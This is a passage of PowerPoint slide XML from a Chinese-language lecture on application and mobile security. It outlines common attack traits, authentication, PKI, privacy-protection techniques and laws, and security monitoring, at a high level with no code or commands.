              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>移动安全，或者更具体地说移动设备安全，是保护智能手机、平板电脑和笔记本电脑免受与无线计算相关的威胁。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>在移动计算中变得越来越重要。尤其令人担忧的是目前存储在智能手机上的个人和商业信息的安全性。</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zh-CN" dirty="0"/>
              <a:t>这些攻击利用了智能手机固有的弱点，这些弱点可能来自通信模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>短消息服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(SMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，又名文本消息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>多媒体消息服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(MMS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、蓝牙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>事实上的全球移动通信标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GSM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>也有针对浏览器或操作系统软件漏洞的漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Mobile App Security Issues] How to Secure Mobile Apps Amid Development">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{593C5228-00E1-A246-ADAD-E3123E5007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27023" y="2509879"/>
            <a:ext cx="5238154" cy="2636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09537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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用安全网络攻击的共性特征</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643869" y="2568103"/>
            <a:ext cx="4845747" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>攻击者可以消耗大量应用资源导致其他用户无法访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t> </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zh-CN" b="1" dirty="0"/>
              <a:t>攻击者可以合法、或者不合法的获取应用数据、推理构造出目标数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t> </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zh-CN" b="1" dirty="0"/>
              <a:t>攻击者利用各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软硬件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>漏洞进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Know Your Enemy: What Happens Behind the Scenes in a DDoS Attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3758A441-72B7-CB47-AC33-045540E060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2386" y="861932"/>
            <a:ext cx="3957470" cy="191535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33DF5F8F-587B-4A4E-A08B-DDE0FEFA90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22590" y="2739155"/>
            <a:ext cx="3457944" cy="195719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FBC78F21-3172-7F4D-9EC1-8633AEB614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79314" y="4843195"/>
            <a:ext cx="3203614" cy="1804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845647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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用安全的基本防御原理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38078" y="1524231"/>
            <a:ext cx="9495451" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>针对应用安全问题的本质及共性原因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>应用安全防御的基本原理和实践规范。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>身份认证与信任管理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>隐私保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>应用安全监控防御</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Public key infrastructure - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A15242-8C74-404C-9B04-AB36DC7D6D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2557" y="3663858"/>
            <a:ext cx="3390900" cy="240030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Symmetric vs. Asymmetric Encryption | 101 Computing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55394AF5-717E-7D45-A612-6A8F2841C5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9698" y="3973829"/>
            <a:ext cx="3228723" cy="1667995"/>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Everything You Need to Know About Firewalls | ColoCrossing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A539F9CA-E1A7-E643-8E05-E72D21F0A3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58094" y="3903585"/>
            <a:ext cx="3201349" cy="2160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49586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3.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>身份认证与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>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38078" y="1524231"/>
            <a:ext cx="9495451" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>身份认证是保证信息安全的第一道门户。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户在被确认身份之后在信息系统中根据身份所有的权限享受相应的信息服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>般常用的身份认证的方式有：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>口令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>生物</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>物理特征、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>图灵测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>对于网络中的大型实体应用来说，一般会利用公钥基础设施来进行身份的管理和认证。</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endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D6A969C-12CB-F94F-89CF-0A9B9C4AE5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893" y="3995677"/>
            <a:ext cx="2785289" cy="2259101"/>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6DE9DB01-D4BD-0746-BBC3-38A91A0FD0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7466" y="4029049"/>
            <a:ext cx="3172077" cy="2257402"/>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E9EDF02D-3427-C94A-A328-F10E4B9F54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6513" y="4274774"/>
            <a:ext cx="3528802" cy="1848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11137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3.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>隐私保护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38078" y="1524231"/>
            <a:ext cx="9495451" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>隐私数据的泄露会引起严重的危险后果，通过身份认证和信任管理可以一定程度保护隐私，但是无法从数据本身保护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>因此可以利用一些隐私保护算法或者技术来对隐私数据进行保护。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>常有的算法包括，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>匿名、差分隐私、隐私计算等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>同时为了保护隐私各个国家和政府都出台了相关法律法规，如美国的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HIPPA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PCI DSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FACT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，欧盟的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GDPR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，以及中国的《网络安全法》等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6720C13-A211-804F-BFE0-7CB6D3974B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7379" y="4033881"/>
            <a:ext cx="3457944" cy="1957196"/>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4B1C89A7-149D-8E43-ACA8-009D91F2C5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5803" y="3610420"/>
            <a:ext cx="5183623" cy="2879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21114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3.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用安全监控防御 </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38078" y="1524231"/>
            <a:ext cx="9495451" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一定网络应用系统的漏洞是无法避免的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在网络发生被攻击、破坏的情况下，可以通过监控检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>快速识别、恢复网络应用的服务，减少损失</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同时在网络系统各个点上部署安全防御措施，避免出现安全的木桶效应</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1548D69E-1B79-B64F-8438-1C94D426E3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7263" y="3555556"/>
            <a:ext cx="3340574" cy="2244866"/>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A 1.3-Tbs DDoS Hit GitHub, the Largest Yet Recorded | WIRED">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F69DD5D-D717-A241-B8DF-4812B7545D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48758" y="3742772"/>
            <a:ext cx="4950808" cy="2142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5397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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>典型案例分析</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38078" y="1524231"/>
            <a:ext cx="9495451" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本节将用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个现实案例，分析应用层的问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24763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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 应用安全的本质及原因</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2094E5C-D113-CF49-9EB0-4D49F1DFBBAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204303" y="2957858"/>
            <a:ext cx="384103" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="700" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA906DA7-C79D-DD4B-B460-B21AB5FA25E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10147528" y="1885826"/>
            <a:ext cx="1633439" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="877888" eaLnBrk="0" hangingPunct="0">
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
